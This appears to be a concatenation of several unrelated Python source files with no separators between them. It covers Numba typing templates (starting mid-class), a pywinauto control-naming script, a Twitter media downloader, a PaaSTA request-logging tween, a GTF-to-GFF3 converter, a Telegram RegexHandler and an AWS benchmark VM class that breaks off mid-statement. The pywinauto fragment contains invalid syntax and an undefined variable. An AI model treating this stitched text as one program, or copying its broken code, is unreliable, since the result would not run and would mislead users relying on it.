UnorderedCmpOp(ConcreteTemplate): cases = OrderedCmpOp.cases + [ signature(types.boolean, op, op) for op in sorted(types.complex_domain)] @builtin class CmpOpLt(OrderedCmpOp): key = '<' @builtin class CmpOpLe(OrderedCmpOp): key = '<=' @builtin class CmpOpGt(OrderedCmpOp): key = '>' @builtin class CmpOpGe(OrderedCmpOp): key = '>=' @builtin class CmpOpEq(UnorderedCmpOp): key = '==' @builtin class CmpOpNe(UnorderedCmpOp): key = '!=' class TupleCompare(AbstractTemplate): def generic(self, args, kws): [lhs, rhs] = args if isinstance(lhs, types.BaseTuple) and isinstance(rhs, types.BaseTuple): for u, v in zip(lhs, rhs): # Check element-wise comparability res = self.context.resolve_function_type(self.key, (u, v), {}) if res is None: break else: return signature(types.boolean, lhs, rhs) @builtin class TupleEq(TupleCompare): key = '==' @builtin class TupleNe(TupleCompare): key = '!=' @builtin class TupleGe(TupleCompare): key = '>=' @builtin class TupleGt(TupleCompare): key = '>' @builtin class TupleLe(TupleCompare): key = '<=' @builtin class TupleLt(TupleCompare): key = '<' # Register default implementations of binary inplace operators for # immutable types. class InplaceImmutable(AbstractTemplate): def generic(self, args, kws): lhs, rhs = args if not lhs.mutable: return self.context.resolve_function_type(self.key[:-1], args, kws) # Inplace ops on mutable arguments must be typed explicitly for _binop, _inp, op in operator_map: if _inp: template = type('InplaceImmutable_%s' % _binop, (InplaceImmutable,), dict(key=op + '=')) builtin(template) class CmpOpIdentity(AbstractTemplate): def generic(self, args, kws): [lhs, rhs] = args return signature(types.boolean, lhs, rhs) @builtin class CmpOpIs(CmpOpIdentity): key = 'is' @builtin class CmpOpIsNot(CmpOpIdentity): key = 'is not' def normalize_1d_index(index): """ Normalize the *index* type (an integer or slice) for indexing a 1D sequence. """ if index == types.slice3_type: return types.slice3_type elif isinstance(index, types.Integer): return types.intp if index.signed else types.uintp @builtin class GetItemCPointer(AbstractTemplate): key = "getitem" def generic(self, args, kws): assert not kws ptr, idx = args if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer): return signature(ptr.dtype, ptr, normalize_1d_index(idx)) @builtin class SetItemCPointer(AbstractTemplate): key = "setitem" def generic(self, args, kws): assert not kws ptr, idx, val = args if isinstance(ptr, types.CPointer) and isinstance(idx, types.Integer): return signature(types.none, ptr, normalize_1d_index(idx), ptr.dtype) @builtin class Len(AbstractTemplate): key = types.len_type def generic(self, args, kws): assert not kws (val,) = args if isinstance(val, (types.Buffer, types.BaseTuple)): return signature(types.intp, val) @builtin class TupleBool(AbstractTemplate): key = "is_true" def generic(self, args, kws): assert not kws (val,) = args if isinstance(val, (types.BaseTuple)): return signature(types.boolean, val) #------------------------------------------------------------------------------- @builtin_attr class MemoryViewAttribute(AttributeTemplate): key = types.MemoryView if PYVERSION >= (3,): def resolve_contiguous(self, buf): return types.boolean def resolve_c_contiguous(self, buf): return types.boolean def resolve_f_contiguous(self, buf): return types.boolean def resolve_itemsize(self, buf): return types.intp def resolve_nbytes(self, buf): return types.intp def resolve_readonly(self, buf): return types.boolean def resolve_shape(self, buf): return types.UniTuple(types.intp, buf.ndim) def resolve_strides(self, buf): return types.UniTuple(types.intp, buf.ndim) def resolve_ndim(self, buf): return types.intp #------------------------------------------------------------------------------- @builtin_attr class BooleanAttribute(AttributeTemplate): key = types.Boolean def resolve___class__(self, ty): return types.NumberClass(ty) @builtin_attr class NumberAttribute(AttributeTemplate): key = types.Number def resolve___class__(self, ty): return types.NumberClass(ty) def resolve_real(self, ty): return getattr(ty, "underlying_float", ty) def resolve_imag(self, ty): return getattr(ty, "underlying_float", ty) @bound_function("complex.conjugate") def resolve_conjugate(self, ty, args, kws): assert not args assert not kws return signature(ty) @builtin_attr class SliceAttribute(AttributeTemplate): key = types.slice3_type def resolve_start(self, ty): return types.intp def resolve_stop(self, ty): return types.intp def resolve_step(self, ty): return types.intp #------------------------------------------------------------------------------- @builtin_attr class NumberClassAttribute(AttributeTemplate): key = types.NumberClass def resolve___call__(self, classty): """ Resolve a number class's constructor (e.g. calling int(...)) """ ty = classty.instance_type def typer(val): return ty return types.Function(make_callable_template(key=ty, typer=typer)) def register_number_classes(register_global): nb_types = set(types.number_domain) nb_types.add(types.bool_) for ty in nb_types: register_global(ty, types.NumberClass(ty)) register_number_classes(builtin_global) #------------------------------------------------------------------------------ class Max(AbstractTemplate): key = max def generic(self, args, kws): assert not kws # max(a, b, ...) if len(args) < 2: return for a in args: if a not in types.number_domain: return retty = self.context.unify_types(*args) if retty is not None: return signature(retty, *args) class Min(AbstractTemplate): key = min def generic(self, args, kws): assert not kws # min(a, b, ...) if len(args) < 2: return for a in args: if a not in types.number_domain: return retty = self.context.unify_types(*args) if retty is not None: return signature(retty, *args) class Round(ConcreteTemplate): key = round if PYVERSION < (3, 0): cases = [ signature(types.float32, types.float32), signature(types.float64, types.float64), ] else: cases = [ signature(types.intp, types.float32), signature(types.int64, types.float64), ] cases += [ signature(types.float32, types.float32, types.intp), signature(types.float64, types.float64, types.intp), ] builtin_global(max, types.Function(Max)) builtin_global(min, types.Function(Min)) builtin_global(round, types.Function(Round)) #------------------------------------------------------------------------------ class Bool(AbstractTemplate): key = bool def generic(self, args, kws): assert not kws [arg] = args if isinstance(arg, (types.Boolean, types.Number)): return signature(types.boolean, arg) # XXX typing for bool cannot be polymorphic because of the # types.Function thing, so we redirect to the "is_true" # intrinsic. return self.context.resolve_function_type("is_true", args, kws) class Int(AbstractTemplate): key = int def generic(self, args, kws): assert not kws [arg] = args if isinstance(arg, types.Integer): return signature(arg, arg) if isinstance(arg, (types.Float, types.Boolean)): return signature(types.intp, arg) class Float(AbstractTemplate): key = float def generic(self, args, kws): assert not kws [arg] = args if arg not in types.number_domain: raise TypeError("float() only support for numbers") if arg in types.complex_domain: raise TypeError("float() does not support complex") if arg in types.integer_domain: return signature(types.float64, arg) elif arg in types.real_domain: return signature(arg, arg) class Complex(AbstractTemplate): key = complex def generic(self, args, kws): assert not kws if len(args) == 1: [arg] = args if arg not in types.number_domain: raise TypeError("complex() only support for numbers") if arg == types.float32: return signature(types.complex64, arg) else: return signature(types.complex128, arg) elif len(args) == 2: [real, imag] = args if (real not in types.number_domain or imag not in types.number_domain): raise TypeError("complex() only support for numbers") if real == imag == types.float32: return signature(types.complex64, real, imag) else: return signature(types.complex128, real, imag) builtin_global(bool, types.Function(Bool)) builtin_global(int, types.Function(Int)) builtin_global(float, types.Function(Float)) builtin_global(complex, types.Function(Complex)) #------------------------------------------------------------------------------ @builtin class Enumerate(AbstractTemplate): key = enumerate def generic(self, args, kws): assert not kws it = args[0] if len(args) > 1 and not args[1] in types.integer_domain: raise TypeError("Only integers supported as start value in " "enumerate") elif len(args) > 2: #let python raise its own error enumerate(*args) if isinstance(it, types.IterableType): enumerate_type = types.EnumerateType(it) return signature(enumerate_type, *args) builtin_global(enumerate, types.Function(Enumerate)) @builtin class Zip(AbstractTemplate): key = zip def generic(self, args, kws): assert not kws if all(isinstance(it, types.IterableType) for it in args): zip_type = types.ZipType(args) return signature(zip_type, *args) builtin_global(zip, types.Function(Zip)) @builtin class Intrinsic_array_ravel(AbstractTemplate): key = intrinsics.array_ravel def generic(self, args, kws): assert not kws [arr] = args if arr.layout in 'CF' and arr.ndim >= 1: return signature(arr.copy(ndim=1), arr) builtin_global(intrinsics.array_ravel, types.Function(Intrinsic_array_ravel)) #------------------------------------------------------------------------------ @builtin class TypeBuiltin(AbstractTemplate): key = type def generic(self, args, kws): assert not kws if len(args) == 1: # One-argument type() -> return the __class__ try: classty = self.context.resolve_getattr(args[0], "__class__") except KeyError: return else: return signature(classty, *args) builtin_global(type, types.Function(TypeBuiltin))
# GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA from application import FindWindows win = FindWindows(title = "Replace", class_name = "#32770")[0] from findbestmatch import find_best_match # get those visible controls that have visible window text visibleTextChildren = [w for w in win.Children if w.IsVisible and w.Text] # get those visible controls that do not have visible window text visibleNonTextChildren = [w for w in win.Children if w.IsVisible and not w.Text] distance_cuttoff = 999 def FindClosestControl(ctrl, text_ctrls): name = ctrl.FriendlyClassName() # now for each of the visible text controls for text_ctrl in text_ctrls: # get aliases to the control rectangles text_r = text_ctrl.Rectangle() ctrl_r = w2.Rectangle() # skip controls where w is to the right of ctrl if text_r.left >= ctrl_r.right: continue # skip controls where w is below ctrl if text_r.top >= ctrl_r.bottom: continue # calculate the distance between the controls ` # (x^2 + y^2)^.5 distance = ( (text_r.left - ctrl_r.left) ** 2 + # (x^2 + (text_r.top - ctrl_r.top) ** 2) \ # y^2) ** .5 # ^.5 # if this distance was closer then the last one if distance_cuttoff > distance < closest and: closest = distance name = text_ctrl.Text.replace(' ', '').replace ('&', '') + ctrl.FriendlyClassName() return name # for each of the items that do not have visible text for w2 in visibleNonTextChildren: closest = 999 newname = '' # now for each of the visible text controls for text_child in visibleTextChildren: # skip controls where w is to the right of w2 if text_child.Rectangle.left >= w2.Rectangle.right: continue # skip controls where w is below w2 if text_child.Rectangle.top >= w2.Rectangle.bottom: continue # calculate teh distance to the control wr = text_child.Rectangle() w2r = w2.Rectangle() distance = ((wr.left - w2r.left) ** 2.0 + (wr.top - w2r.top) ** 2.0) ** .5 # if this distance was closer then the last one if distance < closest: closest = distance newname = text_child.Text.replace(' ', '').replace ('&', '') + w2.FriendlyClassName if closest != 999: print newname
#!/usr/bin/env python __all__ = ['twitter_download'] from ..common import * from .vine import vine_download def extract_m3u(source): r1 = get_content(source) s1 = re.findall(r'(/ext_tw_video/.*)', r1) r2 = get_content('https://video.twimg.com%s' % s1[-1]) s2 = re.findall(r'(/ext_tw_video/.*)', r2) return ['https://video.twimg.com%s' % i for i in s2] def twitter_download(url, output_dir='.', merge=True, info_only=False, **kwargs): html = get_html(url) screen_name = r1(r'data-screen-name="([^"]*)"', html) or \ r1(r'<meta name="twitter:title" content="([^"]*)"', html) item_id = r1(r'data-item-id="([^"]*)"', html) or \ r1(r'<meta name="twitter:site:id" content="([^"]*)"', html) page_title = "{} [{}]".format(screen_name, item_id) try: # extract images urls = re.findall(r'property="og:image"\s*content="([^"]+:large)"', html) assert urls images = [] for url in urls: url = ':'.join(url.split(':')[:-1]) + ':orig' filename = parse.unquote(url.split('/')[-1]) title = '.'.join(filename.split('.')[:-1]) ext = url.split(':')[-2].split('.')[-1] size = int(get_head(url)['Content-Length']) images.append({'title': title, 'url': url, 'ext': ext, 'size': size}) size = sum([image['size'] for image in images]) print_info(site_info, page_title, images[0]['ext'], size) if not info_only: for image in images: title = image['title'] ext = image['ext'] size = image['size'] url = image['url'] print_info(site_info, title, ext, size) download_urls([url], title, ext, size, output_dir=output_dir) except: # extract video # always use i/cards or videos url if not re.match(r'https?://twitter.com/i/', url): url = r1(r'<meta\s*property="og:video:url"\s*content="([^"]+)"', html) if not url: url = 'https://twitter.com/i/videos/%s' % item_id html = get_content(url) data_config = r1(r'data-config="([^"]*)"', html) or \ r1(r'data-player-config="([^"]*)"', html) i = json.loads(unescape_html(data_config)) if 'video_url' in i: source = i['video_url'] if not item_id: page_title = i['tweet_id'] elif 'playlist' in i: source = i['playlist'][0]['source'] if not item_id: page_title = i['playlist'][0]['contentId'] elif 'vmap_url' in i: vmap_url = i['vmap_url'] vmap = get_content(vmap_url) source = r1(r'<MediaFile>\s*<!\[CDATA\[(.*)\]\]>', vmap) if not item_id: page_title = i['tweet_id'] elif 'scribe_playlist_url' in i: scribe_playlist_url = i['scribe_playlist_url'] return vine_download(scribe_playlist_url, output_dir, merge=merge, info_only=info_only) try: urls = extract_m3u(source) except: urls = [source] size = urls_size(urls) mime, ext = 'video/mp4', 'mp4' print_info(site_info, page_title, mime, size) if not info_only: download_urls(urls, page_title, ext, size, output_dir, merge=merge) site_info = "Twitter.com" download = twitter_download download_playlist = playlist_not_supported('twitter')
# Copyright 2015-2016 Yelp Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Creates a tween that logs information about requests. """ import json import traceback from datetime import datetime import pyramid import pytz from paasta_tools.api import settings try: import clog except ImportError: clog = None DEFAULT_REQUEST_LOG_NAME = "tmp_paasta_api_requests" def includeme(config): if clog is not None: config.add_tween( "paasta_tools.api.tweens.request_logger.request_logger_tween_factory", under=pyramid.tweens.INGRESS, ) class request_logger_tween_factory: """Tween that logs information about requests""" def __init__(self, handler, registry): self.handler = handler self.registry = registry self.log_name = registry.settings.get( "request_log_name", DEFAULT_REQUEST_LOG_NAME, ) def _log( self, timestamp=None, level="INFO", additional_fields=None, ): if clog is not None: # `settings` values are set by paasta_tools.api.api:setup_paasta_api if not timestamp: timestamp = datetime.now(pytz.utc) dct = { "human_timestamp": timestamp.strftime("%Y-%m-%dT%H:%M:%S%Z"), "unix_timestamp": timestamp.timestamp(), "hostname": settings.hostname, "level": level, "cluster": settings.cluster, } if additional_fields is not None: dct.update(additional_fields) line = json.dumps(dct, sort_keys=True) clog.log_line(self.log_name, line) def __call__(self, request): start_time = datetime.now(pytz.utc) # start clock for response time request_fields = { "path": request.path, "params": request.params.mixed(), "client_addr": request.client_addr, "http_method": request.method, "headers": dict(request.headers), # incls user agent } response_fields = {} log_level = "INFO" try: response = self.handler(request) response_fields["status_code"] = response.status_int if 300 <= response.status_int < 400: log_level = "WARNING" elif 400 <= response.status_int < 600: log_level = "ERROR" response_fields["body"] = response.body.decode("utf-8") return response except Exception as e: log_level = "ERROR" response_fields.update( { "status_code": 500, "exc_type": type(e).__name__, "exc_info": traceback.format_exc(), } ) raise finally: response_time_ms = ( datetime.now(pytz.utc) - start_time ).total_seconds() * 1000 response_fields["response_time_ms"] = response_time_ms self._log( timestamp=start_time, level=log_level, additional_fields={ "request": request_fields, "response": response_fields, }, )
#!/usr/bin/env python """ Convert Gene Transfer Format [GTF] to Generic Feature Format Version 3 [GFF3]. Usage: python gtf_to_gff_conv.py in.gtf > out.gff3 Requirement: Copyright (C) 2009-2012 Friedrich Miescher Laboratory of the Max Planck Society, Tubingen, Germany. 2012-2013 Memorial Sloan-Kettering Cancer Center New York City, USA. """ import sys import re from common_util import _open_file, buildUTR, addCDSphase def GFFWriter(gtf_file_cont): """ Write feature details to GFF3 """ print '##gff-version 3' for contig, contig_info in sorted(gtf_file_cont.items()): # chromosome for feature, details in contig_info.items(): # gene with source gene_start= gene_stop = [] gnames = None tnames= transcript_details = dict() for ftid, tinfo in details.items(): # transcripts tinfo['exon'].sort() # coordinate system in ascending order. tinfo['CDS'].sort() if tinfo['exon']: gene_start.append(tinfo['exon'][0][0]) gene_stop.append(tinfo['exon'][-1][1]) if not gene_start: continue orient = tinfo['info'][0] tnames[ftid]=tinfo['info'][-1] gnames=tinfo['info'][-2] if len(tinfo['CDS']) == 0: # non coding transcript transcript_details[ftid] = dict(info = tinfo['info'], exon = tinfo['exon'], tpe = 'transcript') else: if tinfo['sp_cod']: # stop codon are seperated from CDS, add the coordinates based on strand if orient == '+': if tinfo['sp_cod'][0][0]-tinfo['CDS'][-1][1] == 1: tinfo['CDS'][-1] = (tinfo['CDS'][-1][0], tinfo['sp_cod'][0][1]) else: tinfo['CDS'].append(tinfo['sp_cod'][0]) if orient == '-': if tinfo['CDS'][0][0]-tinfo['sp_cod'][0][1] == 1: tinfo['CDS'][0] = (tinfo['sp_cod'][0][0], tinfo['CDS'][0][1]) else: tinfo['CDS'].insert(0, tinfo['sp_cod'][0]) if tinfo['exon']: utr5, utr3 = buildUTR(tinfo['CDS'], tinfo['exon'], orient) # getting UTR info from CDS and exon. transcript_details[ftid] = dict(info = tinfo['info'], exon = tinfo['exon'], utr5 = utr5, utr3 = utr3, cds = tinfo['CDS'], tpe = 'mRNA') if gene_start and gene_stop: # displying Gene, transcript and subfeatures gene_start.sort() gene_stop.sort() if gnames == None: gnames = feature[0] # assign gene name as gene id, if not defined pline = [str(contig), feature[1], 'gene', str(gene_start[0]), str(gene_stop[-1]), '.', orient, '.', 'ID=' + feature[0] + ';Name=' + gnames] print '\t'.join(pline) for dtid, dinfo in transcript_details.items(): if dinfo['info'][3]: pline = [str(contig), feature[1], dinfo['tpe'], str(dinfo['exon'][0][0]), str(dinfo['exon'][-1][1]), dinfo['info'][1], orient, '.', 'ID=' + str(dtid) + ';Parent=' + feature[0] + ';Name=' + str(dinfo['info'][3]) ] else: pline = [str(contig), feature[1], dinfo['tpe'], str(dinfo['exon'][0][0]), str(dinfo['exon'][-1][1]), dinfo['info'][1], orient, '.', 'ID=' + dtid + ';Parent=' + feature[0]] print '\t'.join(pline) if 'utr5' in dinfo: for ele in dinfo['utr5']: pline = [str(contig), feature[1], 'five_prime_UTR', str(ele[0]), str(ele[1]), '.', orient, '.', 'Parent=' + dtid] print '\t'.join(pline) if 'cds' in dinfo: cds_w_phase = addCDSphase(orient, dinfo['cds']) for ele in cds_w_phase: pline = [str(contig), feature[1], 'CDS', str(ele[0]), str(ele[1]), '.', orient, str(ele[-1]), 'Parent=' + dtid] print '\t'.join(pline) if 'utr3' in dinfo: for ele in dinfo['utr3']: pline = [str(contig), feature[1], 'three_prime_UTR', str(ele[0]), str(ele[1]), '.', orient, '.', 'Parent=' + dtid] print '\t'.join(pline) if 'exon' in dinfo: intron_start = 0 for xq, ele in enumerate(dinfo['exon']): if xq > 0: pline = [str(contig), feature[1], 'intron', str(intron_start), str(ele[0]-1), '.', orient, '.', 'Parent=' + dtid] print '\t'.join(pline) pline = [str(contig), feature[1], 'exon', str(ele[0]), str(ele[1]), '.', orient, '.', 'Parent=' + dtid] print '\t'.join(pline) intron_start = ele[1]+1 def getGTFcontent(gtf_file): """ Extract GTF features """ GFH = _open_file(gtf_file) gtf_content, recall = dict(), None for rec in GFH: rec = rec.strip('\n\r') #skip empty line fasta identifier and commented line if not rec or rec[0] in ['#', '>']: continue #skip the genome sequence if not re.search('\t', rec): continue parts = rec.split('\t') assert len(parts) >= 8, rec if re.search(r'^(start_codon|start-codon|startcodon)$', parts[2], re.IGNORECASE): continue gid= tid= gname= tname= ttype = None for attb in parts[-1].split(';'): if re.search(r'^\s?$', attb): continue attb = re.sub('"', '', attb).strip() attb = attb.split() if re.search(r'^(gene_id|geneid|name)$', attb[0], re.IGNORECASE): gid = attb[1] elif re.search(r'^(transcript_id|transcriptId)$', attb[0], re.IGNORECASE): tid = attb[1] elif re.search(r'^(gene_name|genename)$', attb[0], re.IGNORECASE): gname = attb[1] elif re.search(r'^(transcript_name|transcriptname)$', attb[0], re.IGNORECASE): tname = attb[1] elif re.search(r'^(transcript_type)$', attb[0], re.IGNORECASE): ttype = attb[1] if gid == tid: #UCSC GTF files, gene & transcript have same identifier gid = 'Gene:'+str(gid) tid = 'Transcript:'+str(tid) if tid == None: #JGI GTF file dont have transcript ID for CDS line tid = recall exon= cds= sp_cod= st_cod = [] if re.search(r'^exon$', parts[2], re.IGNORECASE): exon = [(int(parts[3]), int(parts[4]))] elif re.search(r'^CDS$', parts[2], re.IGNORECASE): cds = [(int(parts[3]), int(parts[4]))] elif re.search(r'^(stop_codon|stop-codon|stopcodon)$', parts[2], re.IGNORECASE): sp_cod = [(int(parts[3]), int(parts[4]))] else: #other lines are not required to GFF line continue #creating feature connections if parts[0] in gtf_content: # adding to existing chromosome if (gid, parts[1]) in gtf_content[parts[0]].keys(): # adding to existing gene if tid in gtf_content[parts[0]][(gid, parts[1])].keys(): # adding to existing transcript if exon: gtf_content[parts[0]][(gid, parts[1])][tid]['exon'].append(exon[0]) elif cds: gtf_content[parts[0]][(gid, parts[1])][tid]['CDS'].append(cds[0]) elif sp_cod: gtf_content[parts[0]][(gid, parts[1])][tid]['sp_cod'].append(sp_cod[0]) else: # inserting new transcript gtf_content[parts[0]][(gid, parts[1])][tid] = dict(exon = exon, CDS = cds, sp_cod = sp_cod, info = [parts[6], parts[5], gname, tname, ttype]) else: # inserting new gene gtf_content[parts[0]][(gid, parts[1])] = {tid : dict(exon = exon, CDS = cds, sp_cod = sp_cod, info = [parts[6], parts[5], gname, tname, ttype])} else: # inserting new chromosome identifier gtf_content[parts[0]] = {(gid, parts[1]) : {tid : dict(exon = exon, CDS = cds, sp_cod = sp_cod, info = [parts[6], parts[5], gname, tname, ttype])}} recall = tid #set previous id for CDS line GFH.close() return gtf_content def __main__(): try: gtf_fname = sys.argv[1] except: print __doc__ sys.exit(-1) gtf_file_content = getGTFcontent(gtf_fname) GFFWriter(gtf_file_content) if __name__ == "__main__": __main__()
#!/usr/bin/env python # # A library that provides a Python interface to the Telegram Bot API # Copyright (C) 2015-2017 # Leandro Toledo de Souza <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser Public License for more details. # # You should have received a copy of the GNU Lesser Public License # along with this program. If not, see [http://www.gnu.org/licenses/]. """ This module contains the RegexHandler class """ import re from future.utils import string_types from .handler import Handler from telegram import Update from telegram.utils.deprecate import deprecate class RegexHandler(Handler): """ Handler class to handle Telegram updates based on a regex. It uses a regular expression to check text messages. Read the documentation of the ``re`` module for more information. The ``re.match`` function is used to determine if an update should be handled by this handler. Args: pattern (str or Pattern): The regex pattern. callback (function): A function that takes ``bot, update`` as positional arguments. It will be called when the ``check_update`` has determined that an update should be processed by this handler. pass_groups (optional[bool]): If the callback should be passed the result of ``re.match(pattern, text).groups()`` as a keyword argument called ``groups``. Default is ``False`` pass_groupdict (optional[bool]): If the callback should be passed the result of ``re.match(pattern, text).groupdict()`` as a keyword argument called ``groupdict``. Default is ``False`` pass_update_queue (optional[bool]): If set to ``True``, a keyword argument called ``update_queue`` will be passed to the callback function. It will be the ``Queue`` instance used by the ``Updater`` and ``Dispatcher`` that contains new updates which can be used to insert updates. Default is ``False``. pass_job_queue (optional[bool]): If set to ``True``, a keyword argument called ``job_queue`` will be passed to the callback function. It will be a ``JobQueue`` instance created by the ``Updater`` which can be used to schedule new jobs. Default is ``False``. pass_user_data (optional[bool]): If set to ``True``, a keyword argument called ``user_data`` will be passed to the callback function. It will be a ``dict`` you can use to keep any data related to the user that sent the update. For each update of the same user, it will be the same ``dict``. Default is ``False``. pass_chat_data (optional[bool]): If set to ``True``, a keyword argument called ``chat_data`` will be passed to the callback function. It will be a ``dict`` you can use to keep any data related to the chat that the update was sent in. For each update in the same chat, it will be the same ``dict``. Default is ``False``. """ def __init__(self, pattern, callback, pass_groups=False, pass_groupdict=False, pass_update_queue=False, pass_job_queue=False, pass_user_data=False, pass_chat_data=False, allow_edited=False, message_updates=True, channel_post_updates=False): super(RegexHandler, self).__init__( callback, pass_update_queue=pass_update_queue, pass_job_queue=pass_job_queue, pass_user_data=pass_user_data, pass_chat_data=pass_chat_data) if isinstance(pattern, string_types): pattern = re.compile(pattern) self.pattern = pattern self.pass_groups = pass_groups self.pass_groupdict = pass_groupdict self.allow_edited = allow_edited self.message_updates = message_updates self.channel_post_updates = channel_post_updates def _is_allowed_message(self, update): return (self.message_updates and (update.message or (update.edited_message and self.allow_edited))) def _is_allowed_channel_post(self, update): return (self.channel_post_updates and (update.channel_post or (update.edited_channel_post and self.allow_edited))) def check_update(self, update): if (isinstance(update, Update) and (self._is_allowed_message(update) or self._is_allowed_channel_post(update)) and update.effective_message.text): match = re.match(self.pattern, update.effective_message.text) return bool(match) else: return False def handle_update(self, update, dispatcher): optional_args = self.collect_optional_args(dispatcher, update) match = re.match(self.pattern, update.effective_message.text) if self.pass_groups: optional_args['groups'] = match.groups() if self.pass_groupdict: optional_args['groupdict'] = match.groupdict() return self.callback(dispatcher.bot, update, **optional_args) # old non-PEP8 Handler methods m = "telegram.RegexHandler." checkUpdate = deprecate(check_update, m + "checkUpdate", m + "check_update") handleUpdate = deprecate(handle_update, m + "handleUpdate", m + "handle_update")
# Copyright 2014 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Class to represent an AWS Virtual Machine object. All VM specifics are self-contained and the class provides methods to operate on the VM: boot, shutdown, etc. """ import json import logging import threading from perfkitbenchmarker import disk from perfkitbenchmarker import errors from perfkitbenchmarker import flags from perfkitbenchmarker import package_managers from perfkitbenchmarker import virtual_machine from perfkitbenchmarker import vm_util from perfkitbenchmarker.aws import aws_disk from perfkitbenchmarker.aws import util FLAGS = flags.FLAGS flags.DEFINE_string('aws_user_name', 'ubuntu', 'This determines the user name that Perfkit will ' 'attempt to use. This must be changed in order to ' 'use any image other than ubuntu.') HVM = 'HVM' PV = 'PV' NON_HVM_PREFIXES = ['m1', 'c1', 't1', 'm2'] US_EAST_1 = 'us-east-1' US_WEST_1 = 'us-west-1' US_WEST_2 = 'us-west-2' EU_WEST_1 = 'eu-west-1' AP_NORTHEAST_1 = 'ap-northeast-1' AP_SOUTHEAST_1 = 'ap-southeast-1' AP_SOUTHEAST_2 = 'ap-southeast-2' SA_EAST_1 = 'sa-east-1' AMIS = { HVM: { US_EAST_1: 'ami-acff23c4', US_WEST_1: 'ami-05717d40', US_WEST_2: 'ami-fbce8bcb', EU_WEST_1: 'ami-30b46b47', AP_NORTHEAST_1: 'ami-d186dcd0', AP_SOUTHEAST_1: 'ami-9afca7c8', AP_SOUTHEAST_2: 'ami-956706af', SA_EAST_1: 'ami-9970d884', }, PV: { US_EAST_1: 'ami-d2ff23ba', US_WEST_1: 'ami-73717d36', US_WEST_2: 'ami-f1ce8bc1', EU_WEST_1: 'ami-4ab46b3d', AP_NORTHEAST_1: 'ami-c786dcc6', AP_SOUTHEAST_1: 'ami-eefca7bc', AP_SOUTHEAST_2: 'ami-996706a3', SA_EAST_1: 'ami-6770d87a', } } PLACEMENT_GROUP_PREFIXES = frozenset( ['c3', 'c4', 'cc2', 'cg1', 'g2', 'cr1', 'r3', 'hi1', 'i2']) NUM_LOCAL_VOLUMES = { 'c1.medium': 1, 'c1.xlarge': 4, 'c3.large': 2, 'c3.xlarge': 2, 'c3.2xlarge': 2, 'c3.4xlarge': 2, 'c3.8xlarge': 2, 'cc2.8xlarge': 4, 'cg1.4xlarge': 2, 'cr1.8xlarge': 2, 'g2.2xlarge': 1, 'hi1.4xlarge': 2, 'hs1.8xlarge': 24, 'i2.xlarge': 1, 'i2.2xlarge': 2, 'i2.4xlarge': 4, 'i2.8xlarge': 8, 'm1.small': 1, 'm1.medium': 1, 'm1.large': 2, 'm1.xlarge': 4, 'm2.xlarge': 1, 'm2.2xlarge': 1, 'm2.4xlarge': 2, 'm3.medium': 1, 'm3.large': 1, 'm3.xlarge': 2, 'm3.2xlarge': 2, 'r3.large': 1, 'r3.xlarge': 1, 'r3.2xlarge': 1, 'r3.4xlarge': 1, 'r3.8xlarge': 2, } DRIVE_START_LETTER = 'b' INSTANCE_EXISTS_STATUSES = frozenset( ['pending', 'running', 'stopping', 'stopped']) INSTANCE_DELETED_STATUSES = frozenset(['shutting-down', 'terminated']) INSTANCE_KNOWN_STATUSES = INSTANCE_EXISTS_STATUSES | INSTANCE_DELETED_STATUSES def GetBlockDeviceMap(machine_type): """Returns the block device map to expose all devices for a given machine. Args: machine_type: The machine type to create a block device map for. Returns: The json representation of the block device map for a machine compatible with the AWS CLI, or if the machine type has no local disks, it will return None. """ if machine_type in NUM_LOCAL_VOLUMES: mappings = [{'VirtualName': 'ephemeral%s' % i, 'DeviceName': '/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i)} for i in xrange(NUM_LOCAL_VOLUMES[machine_type])] return json.dumps(mappings) else: return None def GetImage(machine_type, region): """Gets an ami compatible with the machine type and zone.""" prefix = machine_type.split('.')[0] if prefix in NON_HVM_PREFIXES: return AMIS[PV][region] else: return AMIS[HVM][region] def IsPlacementGroupCompatible(machine_type): """Returns True if VMs of 'machine_type' can be put in a placement group.""" prefix = machine_type.split('.')[0] return prefix in PLACEMENT_GROUP_PREFIXES class AwsVirtualMachine(virtual_machine.BaseVirtualMachine): """Object representing an AWS Virtual Machine.""" _lock = threading.Lock() imported_keyfile_set = set() deleted_keyfile_set = set() def __init__(self, vm_spec): """Initialize a AWS virtual machine. Args: vm_spec: virtual_machine.BaseVirtualMachineSpec object of the vm. """ super(AwsVirtualMachine, self).__init__(vm_spec) self.region = self.zone[:-1] self.image = self.image or GetImage(self.machine_type, self.region) self.user_name = FLAGS.aws_user_name if self.machine_type in NUM_LOCAL_VOLUMES: self.max_local_disks = NUM_LOCAL_VOLUMES[self.machine_type] self.local_disk_counter = 0 def ImportKeyfile(self): """Imports the public keyfile to AWS.""" with self._lock: if self.region in self.imported_keyfile_set: return cat_cmd = ['cat', 